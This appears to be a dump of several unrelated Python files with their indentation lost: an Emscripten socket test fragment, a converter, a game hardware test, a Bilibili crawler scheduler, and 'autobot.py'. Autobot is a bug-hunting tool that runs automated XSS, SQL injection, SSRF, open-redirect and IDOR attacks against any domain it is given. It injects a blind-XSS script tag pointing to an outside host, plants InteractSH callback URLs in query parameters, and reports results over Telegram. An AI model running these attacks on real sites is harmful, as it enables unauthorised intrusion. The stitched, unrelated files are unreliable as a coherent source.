# Test against a Websockified server with runtime WebSocket configuration. We specify both url and subprotocol.
# In this test we have *deliberately* used the wrong port '-DSOCKK=12345' to configure the echo_client.c, so
# the connection would fail without us specifying a valid WebSocket URL in the configuration.
print("\nTesting runtime WebSocket configuration.\n")
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59168)
]:
with harness:
open(os.path.join(self.get_dir(), 'websocket_pre.js'), 'w').write('''
var Module = {
websocket: {
url: 'ws://localhost:59168/testA/testB',
subprotocol: 'text, base64, binary',
}
};
''')
run_process([PYTHON, EMCC, path_from_root('tests', 'sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '--pre-js', 'websocket_pre.js', '-s', 'SOCKET_DEBUG=1', '-DSOCKK=12345'], stdout=PIPE, stderr=PIPE)
out = run_js('client.js', engine=NODE_JS, full_output=True)
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained('connect: ws://localhost:59168/testA/testB, text,base64,binary', out)
|
autobot.py
|
#!/usr/bin/python3
from libs.telegramText import NotifyBot, SendDocumentBot, CheckTokens, GetTokens
import libs.coloredOP as co
from pathlib import Path
from zipfile import ZipFile
from halo import Halo
import threading
import os
import datetime
import re
import requests
import subprocess
import argparse
import sys
import shutil
### GLOBAL VARS
CONFIGPath = "/root/notificationConfig.ini"
TELEGRAMTokens = False
TELEGRAM_KEYS = {}
###
def executeCommand(COMMAND, CallerFunc, verbose=False):
try:
subprocess.run(COMMAND, shell=True, check=True, text=True, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
if verbose:
print("\t"+co.bullets.OK, co.colors.GREEN+"Command Executed Successfully."+co.END)
except subprocess.CalledProcessError as e:
print("\t"+co.bullets.ERROR, co.colors.BRED+"{} : Error During Command Execution.!!".format(CallerFunc)+co.END)
print(e.output)
return
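# A minimal usage sketch of executeCommand above (the command string and caller
# label are illustrative):
#
#   executeCommand('echo hello', 'ExampleCaller', verbose=True)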
def ValideteDomain(domain):
regex = "^((?!-)[A-Za-z0-9-]{1,63}(?<!-)\\.)+[A-Za-z]{2,6}"
d = re.compile(regex)
if(re.search(d, domain)):
return True
else:
return False
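# A quick illustration of the validator above (hypothetical inputs):
#
#   ValideteDomain("example.com")      # True
#   ValideteDomain("sub.example.org")  # True
#   ValideteDomain("not a domain")     # False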
def CompressFile(FName, Files):
with ZipFile(FName, mode="w") as zf:
for f in Files:
zf.write(f)
def CollectURLS(Domain):
# collecting urls using waybackurls
    CallerFunc = "CollectURLS"
COMMAND = 'echo {} | waybackurls | egrep -v ".css|.png|.jpeg|.jpg|.svg|.gif|.ttf|.woff|.woff2|.eot|.otf|.ico|.js" >> temp_urls.txt'.format(Domain)
executeCommand(COMMAND, CallerFunc)
## Collecting urls from gau
COMMAND = 'gau -b css,png,jpeg,jpg,svg,gif,ttf,woff,woff2,eot,otf,ico,js {} | anew -q temp_urls.txt'.format(Domain)
executeCommand(COMMAND, CallerFunc)
# use qsreplace to remove duplicates
COMMAND = 'cat temp_urls.txt | sed -e "s/=.*/=/" -e "s/URL: //" | qsreplace -a >> urls.txt 2>&1'
executeCommand(COMMAND, CallerFunc)
# deleting extra file
os.remove("temp_urls.txt")
# count number of lines
numOfLines = open("urls.txt", "r").read().count("\n")-1
global TELEGRAMTokens
global TELEGRAM_KEYS
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : {} URLs collected for {}".format(numOfLines, Domain))
def XSSAttack(Domain, BlindXSS=None):
CallerFunc = "XSSAttack"
global TELEGRAMTokens
global TELEGRAM_KEYS
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : XSS Scan Started on target {}".format(Domain))
COMMAND = 'cat urls.txt | gf xss | httpx -mc 200,201,202,300,301,302 -silent >> xss_urls.txt'
executeCommand(COMMAND, CallerFunc)
if BlindXSS:
# checking xss using dalfox including blind xss
COMMAND = 'dalfox file xss_urls.txt -b {} -o xss_dalfox.txt -H \"referrer: xxx\'><script src=//{}></script>\" 2>&1 /dev/null'.format(BlindXSS, BlindXSS)
executeCommand(COMMAND, CallerFunc)
else:
# checking xss using dalfox for stored and reflected xss
COMMAND = 'dalfox file xss_urls.txt -o xss_dalfox.txt 2>&1 /dev/null'
executeCommand(COMMAND, CallerFunc)
# checking with kxss
COMMAND = 'cat xss_urls.txt | kxss >> xss_kxss.txt 2>&1 /dev/null'
executeCommand(COMMAND, CallerFunc)
# compress files
FName = "{}_xss.zip".format(Domain)
if os.path.isfile("xss_dalfox.txt") and os.path.isfile("xss_kxss.txt"):
CompressFile(FName, ['xss_dalfox.txt', 'xss_kxss.txt'])
os.remove("xss_dalfox.txt")
os.remove("xss_kxss.txt")
else:
        if os.path.isfile("xss_dalfox.txt"):
CompressFile(FName, ['xss_dalfox.txt'])
os.remove("xss_dalfox.txt")
elif os.path.isfile("xss_kxss.txt"):
CompressFile(FName, ['xss_kxss.txt'])
os.remove("xss_kxss.txt")
# cleaning extra files
os.remove("xss_urls.txt")
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : XSS Scan Finished on target {} ✅".format(Domain))
if os.path.isfile(FName):
if os.path.getsize(FName) < 52428800:
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : Download XSS Scan Result : {}".format(FName))
SendDocumentBot(TELEGRAM_KEYS, FName)
else:
if TELEGRAMTokens:
                NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : XSS Scan Result file {} is bigger than 50MB, download it manually from the server ℹ️".format(FName))
def SQLInjection(Domain):
CallerFunc = "SQLInjection"
global TELEGRAMTokens
global TELEGRAM_KEYS
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : SQLi Scan Started on target {}".format(Domain))
executeCommand('cat urls.txt | gf sqli | httpx -mc 200,201,202,300,301,302 -silent >> sqli_urls.txt 2>&1 /dev/null', CallerFunc)
# perform sql injection attack on target
executeCommand('sqlmap -m sqli_urls.txt --batch --random-agent --level 1 >> sqli_result.txt 2>&1 /dev/null', CallerFunc)
# compress files
FName = "{}_sqli.zip".format(Domain)
if os.path.isfile("sqli_result.txt"):
CompressFile(FName, ['sqli_result.txt'])
os.remove("sqli_result.txt")
os.remove("sqli_urls.txt")
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : SQLi Scan Finished on target {} ✅".format(Domain))
if os.path.isfile(FName):
if os.path.getsize(FName) < 52428800:
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : Download SQLi Scan Result : {}".format(FName))
SendDocumentBot(TELEGRAM_KEYS, FName)
else:
if TELEGRAMTokens:
                NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : SQLi Scan Result file {} is bigger than 50MB, download it manually from the server ℹ️".format(FName))
def SSRFScan(Domain, InteractSH):
CallerFunc = "SSRFScan"
global TELEGRAMTokens
global TELEGRAM_KEYS
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : SSRF Scan Started on target {}".format(Domain))
executeCommand('cat urls.txt | gf ssrf | httpx -mc 200,201,202,300,301,302 -silent >> ssrf_urls.txt', CallerFunc)
COMMAND = 'cat ssrf_urls.txt | qsreplace "https://{}" >> ssrf_paylod_urls.txt 2>&1 /dev/null'.format(InteractSH)
executeCommand(COMMAND, CallerFunc)
executeCommand('ffuf -c -w ssrf_paylod_urls.txt -u FUZZ -o ssrf_fuzz_result.txt 2>&1 /dev/null', CallerFunc)
# cleaning extra files
os.remove("ssrf_urls.txt")
os.remove("ssrf_paylod_urls.txt")
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : SSRF Scan Finished on target {} ✅".format(Domain))
        NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : Check your InteractSH instance for any hits!")
def OpenRedirect(Domain):
CallerFunc = "OpenRedirect"
global TELEGRAMTokens
global TELEGRAM_KEYS
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : Open-Redirect Started on target {}".format(Domain))
executeCommand('cat urls.txt | gf redirect | httpx -mc 200,201,202,300,301,302 -silent >> openredirect_urls.txt', CallerFunc)
# compress files
FName = "{}_openRedirect.zip".format(Domain)
if os.path.isfile("openredirect_urls.txt"):
CompressFile(FName, ['openredirect_urls.txt'])
os.remove("openredirect_urls.txt")
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : Open-Redirect Scan Finished on target {} ✅".format(Domain))
if os.path.isfile(FName):
if os.path.getsize(FName) < 52428800:
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : Download OpenRedirect Scan Result {} for manual analysis.".format(FName))
SendDocumentBot(TELEGRAM_KEYS, FName)
else:
if TELEGRAMTokens:
                NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : OpenRedirect Scan Result file {} is bigger than 50MB, download it manually from the server ℹ️".format(FName))
def IDORScan(Domain):
CallerFunc = "IDORScan"
global TELEGRAMTokens
global TELEGRAM_KEYS
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : IDORScan Started on target {}".format(Domain))
executeCommand('cat urls.txt | gf idor | httpx -mc 200,201,202,300,301,302 -silent >> idor_urls.txt', CallerFunc)
# compress files
FName = "{}_idor.zip".format(Domain)
if os.path.isfile("idor_urls.txt"):
CompressFile(FName, ['idor_urls.txt'])
os.remove("idor_urls.txt")
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : IDOR Scan Finished on target {} ✅".format(Domain))
if os.path.isfile(FName):
if os.path.getsize(FName) < 52428800:
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : Download IDOR Scan Result {} for manual analysis.".format(FName))
SendDocumentBot(TELEGRAM_KEYS, FName)
else:
if TELEGRAMTokens:
                NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : IDOR Scan Result file {} is bigger than 50MB, download it manually from the server ℹ️".format(FName))
def Banner():
print(co.colors.BLUE+"################################################################################"+co.END)
print(co.colors.GREEN+"""
d8888 888 888888b. 888
d88888 888 888 "88b 888
d88P888 888 888 .88P 888
d88P 888 888 888 888888 .d88b. 8888888K. .d88b. 888888
d88P 888 888 888 888 d88""88b 888 "Y88b d88""88b 888
d88P 888 888 888 888 888 888 888 888 888 888 888
d8888888888 Y88b 888 Y88b. Y88..88P 888 d88P Y88..88P Y88b.
d88P 888 "Y88888 "Y888 "Y88P" 8888888P" "Y88P" "Y888 """+co.colors.RED+"Version 0.1\n"+co.END)
print("# "+co.BOLD+"Author : "+co.colors.CYAN+"Ajay Kumar Tekam [ ajaytekam.github.io ]"+co.END)
print("# "+co.BOLD+"Blog : "+co.colors.CYAN+"https://sec-art.net/"+co.END)
print("# "+co.BOLD+"About Tool : "+co.colors.CYAN+"Perform Automated Checks for XSS, SQLI, OpenRedirect, SSRF, IDOR."+co.END)
print(co.colors.BLUE+"################################################################################\n"+co.END)
def printInfo(Domain, OPDir):
print(co.bullets.INFO, co.colors.CYAN+"Target Domain : {}".format(Domain)+co.END)
print(co.bullets.INFO, co.colors.CYAN+"Result Dir : {}".format(OPDir)+co.END)
class MyParser(argparse.ArgumentParser):
def error(self, message):
Banner()
sys.stderr.write('error: %s\n' % message)
self.print_help()
sys.exit(2)
def main():
parser = MyParser()
parser.add_argument("-d", "--domain", help="Domain name to perform Attack", type=str, required=True)
parser.add_argument("-o", "--out", help="Output directory name", type=str)
parser.add_argument("-b", "--blind", help="XSS hunter URL for Blind XSS inection Testing", type=str, default=None)
parser.add_argument("-i", "--interactSH", help="InteractSH URL for Catching SSRF", type=str, required=True)
args = parser.parse_args()
# Check argument
if args.domain is None and args.interactSH is None:
Banner()
parser.print_help()
sys.exit()
## GLOBAL Vars
Banner()
tDomain = "" # raw domain name
OPDir = "" # Output Directory
    # validate url
if(ValideteDomain(args.domain)):
tDomain = args.domain
else:
        print(co.bullets.ERROR, co.colors.BRED+" Invalid Domain: {}".format(args.domain)+co.END)
sys.exit()
# get the http protocol
try:
tempD = requests.head("https://"+tDomain, allow_redirects=True, timeout=8)
Domain = tempD.url
Domain = re.sub(":443/$", "", Domain)
except:
try:
tempD = requests.head("http://"+tDomain, allow_redirects=True, timeout=8)
Domain = tempD.url
Domain = re.sub(":80/$", "", Domain)
except:
print(co.bullets.ERROR, co.colors.BRED+" Error : Could not resolve the Http protocol.!!"+co.END)
sys.exit(1)
    # check telegram keys
global CONFIGPath
global TELEGRAMTokens
global TELEGRAM_KEYS
retVal = CheckTokens(CONFIGPath)
if retVal == 1:
print(co.bullets.DONE+co.colors.GREEN+" Telegram API Keys found."+co.END)
TELEGRAMTokens = True
apiToken, chatID = GetTokens(CONFIGPath)
TELEGRAM_KEYS['apiToken'] = apiToken
TELEGRAM_KEYS['chatID'] = chatID
elif retVal == 2:
        print(co.bullets.ERROR+co.colors.RED+" Telegram Bot keys not found!"+co.END)
elif retVal == 3:
        print(co.bullets.ERROR+co.colors.RED+" Telegram Bot config file not found!"+co.END)
# Sending telegram message
if TELEGRAMTokens:
        NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : Automated attack started for domain : {}".format(tDomain))
# Create output dir
if args.out is not None:
OPDir = args.out
if os.path.isdir(OPDir):
print(co.bullets.INFO+co.colors.CYAN+" {} already exists...".format(OPDir)+co.END)
print(co.bullets.INFO+co.colors.CYAN+" Adding time-stamp into the directory name as suffix"+co.END)
Date = str(datetime.datetime.now())
WORKDIR = re.sub("-|:|\.|\ ", "_", Date)
OPDir += "_{}".format(WORKDIR)
else:
OPDir = "./autobot_{}".format(tDomain)
if os.path.isdir(OPDir):
print(co.bullets.INFO+co.colors.CYAN+" {} already exists...".format(OPDir)+co.END)
print(co.bullets.INFO+co.colors.CYAN+" Adding time-stamp into the directory name as suffix"+co.END)
Date = str(datetime.datetime.now())
WORKDIR = re.sub("-|:|\.|\ ", "_", Date)
OPDir += "_{}".format(WORKDIR)
os.mkdir(OPDir)
printInfo(Domain, OPDir)
#################
# Change directory
os.chdir(OPDir)
# Setting-up the spinner
spinner = Halo(text=' ', spinner='dots')
print(co.bullets.INFO+co.colors.CYAN+" Collecting Target Domain URLs.."+co.END)
spinner.start()
    ## Collecting urls
CollectURLS(tDomain)
spinner.stop()
print(co.bullets.DONE+co.colors.GREEN+" URLs Collected.."+co.END)
spinner.start()
    ## start XSS scan
t1 = threading.Thread(target=XSSAttack, args=(tDomain, args.blind,))
t1.start()
spinner.stop()
print(co.bullets.INFO+co.colors.CYAN+" XSS Scan Started.."+co.END)
spinner.start()
## start SQLi scan
t2 = threading.Thread(target=SQLInjection, args=(tDomain,))
t2.start()
spinner.stop()
print(co.bullets.INFO+co.colors.CYAN+" SQLi Scan Started.."+co.END)
spinner.start()
## start SSRF Scan
t3 = threading.Thread(target=SSRFScan, args=(tDomain,args.interactSH,))
t3.start()
spinner.stop()
print(co.bullets.INFO+co.colors.CYAN+" SSRF Scan Started.."+co.END)
spinner.start()
## Open redirect scan
t4 = threading.Thread(target=OpenRedirect, args=(tDomain,))
t4.start()
spinner.stop()
print(co.bullets.INFO+co.colors.CYAN+" Open Redirect Scan Started.."+co.END)
spinner.start()
# IDOR Scan
t5 = threading.Thread(target=IDORScan, args=(tDomain,))
t5.start()
spinner.stop()
print(co.bullets.INFO+co.colors.CYAN+" IDOR Scan Started.."+co.END)
spinner.start()
t1.join()
t2.join()
t3.join()
t4.join()
t5.join()
spinner.stop()
    print(co.bullets.DONE+co.colors.GREEN+" All Scans Completed"+co.END)
spinner.start()
os.chdir("..")
files = os.listdir(OPDir)
try:
CompressFile("{}_autobot.zip".format(OPDir), files)
spinner.stop()
print(co.bullets.DONE+co.colors.GREEN+" Resultfile : {}_autobot.zip".format(OPDir)+co.END)
spinner.start()
shutil.rmtree(OPDir)
except:
spinner.stop()
print(co.bullets.DONE+co.colors.GREEN+" Resultfile : {}".format(OPDir)+co.END)
spinner.start()
spinner.stop()
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "✅ AutoBot Scan Completed for : {}".format(tDomain))
print(co.bullets.DONE+co.colors.GREEN+" AutoBot Scan Completed."+co.END)
if __name__ == "__main__":
main()
|
convertor.py
|
# !pip3 install xlrd
import pandas as pd
import numpy as np
from pathlib import Path
import os
from threading import Thread
from queue import Queue
import multiprocessing
# !pip3 install khayyam
from khayyam import JalaliDate, JalaliDatetime
xcelLocation = "../xcels/"
HEADER = ["symbol", "name", "amount", "volume", "value", "lastday", "open", "close",
"last-change", "last-percent", "ending", "ending-change", "ending-percent",
"min", "max",]
HEADER_extra = HEADER + ["year", "month", "day", "date"]
# Collect the .xlsx file names (without the extension) from the spreadsheet directory
names = [p.stem for p in Path(xcelLocation).glob("*.xlsx")]
def cleaner():
for name in names:
if os.path.getsize(xcelLocation + name + '.xlsx') < 10000:
os.remove(xcelLocation + name + '.xlsx')
def convert(xcelLocation, xlFileName, returnAllMode=False):
xl = None
try:
if (not Path(xcelLocation + xlFileName + '.csv').is_file()) or returnAllMode:
xl = pd.read_excel(xcelLocation + xlFileName + ".xlsx",
header=[0], skiprows=[0,1], convert_float=False)
xl.columns = HEADER
xl.to_csv(xcelLocation + xlFileName + '.csv', encoding='utf-8', index=False, header=HEADER)
except:
xl = str(xlFileName)
finally:
return xl
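# A minimal usage sketch of convert() above (the file name is illustrative): on
# success it returns a DataFrame and writes the CSV next to the .xlsx, on
# failure it returns the offending file name as a string.
#
#   result = convert(xcelLocation=xcelLocation, xlFileName="1398-01-05", returnAllMode=True)
#   if isinstance(result, str):
#       print("failed to convert", result)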
def convertThread(threadname, q, qDFs, qErrors):
while not q.empty():
fileNames = q.get()
q.task_done()
for name in fileNames:
tmp = convert(xcelLocation=xcelLocation, xlFileName=name, returnAllMode=True)
if isinstance(tmp, str):
qErrors.put(tmp)
else:
qDFs.put((tmp.copy(), name))
print(str(threadname) + " done")
def convert_all(batchSize=10, numThread=16):
all_dfs = []
all_df_names = []
i = 0
workers = []
pool = multiprocessing.Pool(processes=numThread)
m = multiprocessing.Manager()
queue = m.Queue()
qDFs = m.Queue()
qErrors = m.Queue()
while i*batchSize < len(names):
if (i+1)*batchSize < len(names):
queue.put(names[i*batchSize:(i+1)*batchSize])
else:
            queue.put(names[i*batchSize:])
i+=1
print(len(names))
print(queue.qsize())
for i in range(numThread):
# workers.append(Thread(target=readThread, args=("Thread-" + str(i), queue, qsum, qcount)))
# workers.append(pool.apply_async(readThread, ("Thread-" + str(i), queue, qsum, qcount,)))
workers.append(multiprocessing.Process(target=convertThread, args=("Thread-" + str(i),
queue, qDFs, qErrors)))
workers[i].start()
for i in range(numThread):
workers[i].join()
while not qDFs.empty():
dftmp, nametmp = qDFs.get()
all_dfs.append(dftmp)
all_df_names.append(nametmp)
errors = []
while not qErrors.empty():
errors.append(qErrors.get())
print(len(all_dfs))
return all_dfs, all_df_names, errors
def makeMasterTable(all_dfs, all_df_names, chunkSize):
for index, df in enumerate(all_dfs):
year, month, day = all_df_names[index].split("-")
date = JalaliDate(year, month, day).todate()
yearlist = np.full(len(df), year).tolist()
monthlist = np.full(len(df), month).tolist()
daylist = np.full(len(df), day).tolist()
datelist = np.full(len(df), date).tolist()
df["year"] = yearlist
df["month"] = monthlist
df["day"] = daylist
df["date"] = datelist
xl = pd.concat(all_dfs, keys=all_df_names, ignore_index=True)
xl.columns = HEADER_extra
xl = xl.astype({"year": int, "month": int, "day": int})
xl['date'] = pd.to_datetime(xl['date'])
print(xl.dtypes)
xl.sort_values(by=['date'], inplace=True)
xl.reset_index(drop=True, inplace=True)
i = 0
while i*chunkSize < len(xl):
if (i+1)*chunkSize < len(xl):
df_i = xl.iloc[i*chunkSize:(i+1)*chunkSize]
else:
df_i = xl.iloc[i*chunkSize:]
df_i.to_csv('{xcelLocation}master{i}.csv'.format(i=i, xcelLocation=xcelLocation),
header=HEADER_extra, encoding='utf-8', index=False)
i += 1
return xl
def write_errors(errors):
with open("errors", 'w') as error_file:
for error in errors:
error_file.write(str(error))
error_file.write("\n")
def error_cleaner(errors):
for name in errors:
os.remove(xcelLocation + name + '.xlsx')
|
hwtest.py
|
################################################################################
#
# rpiloui - a python game engine for hasbros looping loui game controlled via a
# raspberry pi single board computer
#
# This code is released under:
#
# Copyright (c) 2020 nasrudin2468
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
################################################################################
################################################################################
# Import Libraries
import subprocess
import time
import multiprocessing as mp
################################################################################
# Constants
################################################################################
# classes / structs
################################################################################
# Import external functions
from . import motor
from . import muxio
# Prevent direct access to this file since it would be useless
if __name__ == '__main__':
exit()
################################################################################
# Functions
# function: hwtest(objcfg)
#	runs an interactive test of the connected hardware (audio, LED, motor, mux inputs)
#	Input:	object containing the hardware configuration
#	Output: -
def hwtest(objcfg):
print("hardware testmodus.")
# Initiate hardware first
motor.init(motor, objcfg)
#muxio.init(muxio, objcfg)
objmuxio = muxio.muxiodata(objcfg) # create mux data object
funcmuxio = muxio.muxiofunc(objcfg) # create mux control object
rawtx = input(" - audio test: (enter n if you want to skip this test)")
if (rawtx != "n"):
subprocess.call("aplay ./user/audiofiles/audiotest.wav", shell=True)
else:
print ("test skipped.\n")
rawtx = ""
rawtx = input(" - LED test: (enter n if you want to skip this test)")
if (rawtx != "n"):
i = 0
subprocess.call("python3 ./lib/_runcolorcycle.py", shell=True )
else:
print ("test skipped.\n")
rawtx = input(" - motor test: (enter n if you want to skip this test)")
if (rawtx != "n"):
i = 0
k = 0
# Speed motor up from 0% to 100% clockwise
while (i < 100):
print ("Motor Speed [%]: ",i)
if (i == 0):
k = 0
else:
k = (i/100)
motor._set(motor, (k))
time.sleep(0.05)
i+=1
# Decrease motor speed from +100% clockwise to -100% (counterclockwise)
while (i > -100):
print ("Motor Speed [%]: ",i)
if (i == 0):
k = 0
else:
k = (i/100)
motor._set(motor, (k))
time.sleep(0.05)
i-= 1
# Decrease motor speed from -100% (counterclockwise) to 0%
while (i < 0):
print ("Motor Speed [%]: ",i)
if (i == 0):
k = 0
else:
k = (i/100)
motor._set(motor, (k))
time.sleep(0.05)
i+= 1
motor._set(motor, (0))
print(" ...done!\n")
else:
print ("test skipped.\n")
rawtx = input(" - mux input test: (enter n if you want to skip this test)")
if (rawtx != "n"):
testtime = time.time()+30 # Run test for 30 seconds
		muxio.update(objmuxio)  # Update to the initial state since different actors have different idle states
while (time.time() < testtime):
muxio.poll(objmuxio, funcmuxio) # poll actual muxdata
muxio.debugreaddelta(objmuxio) # report changed values via console
muxio.update(objmuxio) # update muxdata object
else:
print ("test skipped.\n")
print("hardware test finished.")
def playdemosound():
subprocess.call("aplay ./user/audiofiles/demoaudio.wav", shell=True)
# function: demo(objcfg)
#	demonstration of all hardware functions
#	Input:	object containing the hardware configuration
#	Output: -
def demo(objcfg):
# Initiate hardware first
motor.init(motor, objcfg)
#muxio.init(muxio, objcfg)
objmuxio = muxio.muxiodata(objcfg) # create mux data object
funcmuxio = muxio.muxiofunc(objcfg) # create mux control object
playdemo = mp.Process(target=playdemosound, args=())
time.sleep(2)
motor._set(motor, (0.6))
playdemo.start()
while (True):
subprocess.call("python3 ./lib/demoled.py", shell=True )
|
scheduler.py
|
import schedule
import threading
from time import sleep
import datetime
from biliob_tracer.task import ProgressTask
import requests
import redis
from lxml import etree
import json
from db import redis_connection
from db import db
import logging
from biliob_analyzer.author_rate_caculate import author_fans_rate_caculate
from biliob_analyzer.video_rank import compute_video_rank_table
from biliob_analyzer.author_rank import calculate_author_rank
from biliob_tracer.task import ExistsTask
from biliob_analyzer.video_rank import calculate_video_rank
from biliob_analyzer.author_fans_watcher import FansWatcher
logging.basicConfig(level=logging.INFO,
format='[%(asctime)s] %(levelname)s @ %(name)s: %(message)s')
logger = logging.getLogger(__name__)
VIDEO_URL = "https://api.bilibili.com/x/article/archives?ids={aid}"
VIDEO_KEY = "videoRedis:start_urls"
AUTHOR_URL = "https://api.bilibili.com/x/web-interface/card?mid={mid}"
AUTHOR_KEY = "authorRedis:start_urls"
DANMAKU_FROM_AID_URL = "https://api.bilibili.com/x/web-interface/view?aid={aid}"
DANMAKU_KEY = "DanmakuAggregate:start_urls"
SITEINFO_URL = 'https://api.bilibili.com/x/web-interface/online'
SITEINFO_KEY = "site:start_urls"
def auto_crawl_bangumi():
task_name = "生成番剧国创待爬链接"
logger.info(task_name)
redis_connection.rpush("bangumiAndDonghua:start_urls",
"https://www.bilibili.com/ranking/bangumi/167/0/7")
redis_connection.rpush("bangumiAndDonghua:start_urls",
"https://www.bilibili.com/ranking/bangumi/13/0/7")
def auto_add_video():
task_name = "生成作者最新发布的视频的待爬链接"
logger.info(task_name)
coll = db['author']
doc_filter = {'$or': [{'focus': True}, {'forceFocus': True}]}
total = coll.count_documents(doc_filter)
c = coll.find(doc_filter, {'mid': 1})
if total != 0:
for each_doc in c:
URL = 'https://space.bilibili.com/ajax/member/getSubmitVideos?mid={}&pagesize=10&page=1&order=pubdate'.format(
each_doc['mid'])
redis_connection.rpush("videoAutoAdd:start_urls", URL)
def auto_add_author():
task_name = "生成排行榜待爬链接"
logger.info(task_name)
start_urls = [
'https://www.bilibili.com/ranking',
'https://www.bilibili.com/ranking/all/1/0/3',
'https://www.bilibili.com/ranking/all/168/0/3',
'https://www.bilibili.com/ranking/all/3/0/3',
'https://www.bilibili.com/ranking/all/129/0/3',
'https://www.bilibili.com/ranking/all/188/0/3',
'https://www.bilibili.com/ranking/all/4/0/3',
'https://www.bilibili.com/ranking/all/36/0/3',
'https://www.bilibili.com/ranking/all/160/0/3',
'https://www.bilibili.com/ranking/all/119/0/3',
'https://www.bilibili.com/ranking/all/155/0/3',
'https://www.bilibili.com/ranking/all/5/0/3',
'https://www.bilibili.com/ranking/all/181/0/3'
]
for each in start_urls:
redis_connection.rpush('authorAutoAdd:start_urls', each)
def crawlOnlineTopListData():
task_name = "生成强力追踪待爬链接"
logger.info(task_name)
ONLINE_URL = 'https://www.bilibili.com/video/online.html'
response = requests.get(ONLINE_URL)
data_text = etree.HTML(response.content.decode(
'utf8')).xpath('//script/text()')[-2]
    # NOTE: str.lstrip() strips a *set* of leading characters rather than a literal
    # prefix; it works here only because the JSON payload begins with '{'.
    j = json.loads(data_text.lstrip('window.__INITIAL_STATE__=')[:-122])
total = len(j['onlineList'])
for each_video in j['onlineList']:
aid = each_video['aid']
mid = each_video['owner']['mid']
if mid not in [7584632, 928123]:
priorityAuthorCrawlRequest(mid)
priorityVideoCrawlRequest(aid)
def set_minute_level_author(mid: int):
    # datetime.now() expects a tzinfo object rather than a string such as "CN",
    # so record the plain local time here.
    db['minute_level_author'].update(
        {'mid': mid}, {'mid': mid, 'date': datetime.datetime.now()})
def update_author():
task_name = "生成每日作者待爬链接"
logger.info(task_name)
coll = db['author']
filter_dict = {
'$or': [{
'focus': True
}, {
'forceFocus': True
}]
}
cursor = coll.find(filter_dict, {"mid": 1}).batch_size(200)
total = coll.count_documents(filter_dict)
if total != 0:
for each_doc in cursor:
redis_connection.rpush(
AUTHOR_KEY, AUTHOR_URL.format(mid=each_doc['mid']))
def update_unfocus_video():
task_name = "生成保守观测视频待爬链接"
logger.info(task_name)
doc_filter = {}
gen_video_link_by_filter(task_name, doc_filter)
def update_video():
task_name = "生成每日视频待爬链接"
logger.info(task_name)
doc_filter = {'focus': True}
gen_video_link_by_filter(task_name, doc_filter)
def gen_video_link_by_filter(task_name, doc_filter):
coll = db['video']
cursor = coll.find(doc_filter, {"aid": 1}).batch_size(200)
send_aids(task_name, 1, cursor)
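# send_aids pushes the aids to Redis in batches of 50 ids per request URL: for
# example, a cursor yielding 120 documents produces two URLs with 50 ids each
# and a final URL with the remaining 20 ids.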
def send_aids(task_name, total, cursor):
if total == 0:
return
aid_list = ''
i = 0
c = 0
for each_doc in cursor:
c += 1
aid_list += str(each_doc['aid']) + ','
i += 1
logger.info(each_doc['aid'])
        if i == 50:
            logger.info('dispatching No.{}'.format(c))
            redis_connection.rpush(
                VIDEO_KEY, VIDEO_URL.format(aid=aid_list[:-1]))
            aid_list = ''
            i = 0
    if aid_list:
        # push the remaining (< 50) aids instead of an empty request
        redis_connection.rpush(
            VIDEO_KEY, VIDEO_URL.format(aid=aid_list[:-1]))
def sendAuthorCrawlRequest(mid):
redis_connection.rpush(AUTHOR_KEY, AUTHOR_URL.format(mid=mid))
def sendVideoCrawlRequest(aid):
redis_connection.rpush(VIDEO_KEY, VIDEO_URL.format(aid=aid))
def priorityAuthorCrawlRequest(mid):
redis_connection.lpush(AUTHOR_KEY, AUTHOR_URL.format(mid=mid))
def priorityVideoCrawlRequest(aid):
redis_connection.lpush(VIDEO_KEY, VIDEO_URL.format(aid=aid))
